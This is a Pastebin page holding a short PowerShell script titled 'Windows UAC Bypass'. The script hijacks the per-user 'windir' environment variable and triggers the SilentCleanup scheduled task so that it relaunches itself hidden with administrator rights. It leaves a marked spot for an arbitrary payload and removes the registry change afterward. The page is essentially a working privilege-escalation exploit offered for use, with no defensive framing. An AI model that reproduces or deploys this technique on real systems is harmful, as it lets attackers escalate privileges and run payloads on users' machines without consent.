Advertisement
metalx1000

Windows UAC Bypass

Mar 14th, 2019
1,021
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/
  2.  
  3. if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
  4.     #Payload goes here
  5.     #It'll run as Administrator
  6. } else {
  7.     $registryPath = "HKCU:\Environment"
  8.     $Name = "windir"
  9.     $Value = "powershell -ep bypass -w h $PSCommandPath;#"
  10.     Set-ItemProperty -Path $registryPath -Name $name -Value $Value
  11.     #Depending on the performance of the machine, some sleep time may be required before or after schtasks
  12.     schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
  13.     Remove-ItemProperty -Path $registryPath -Name $name
  14. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement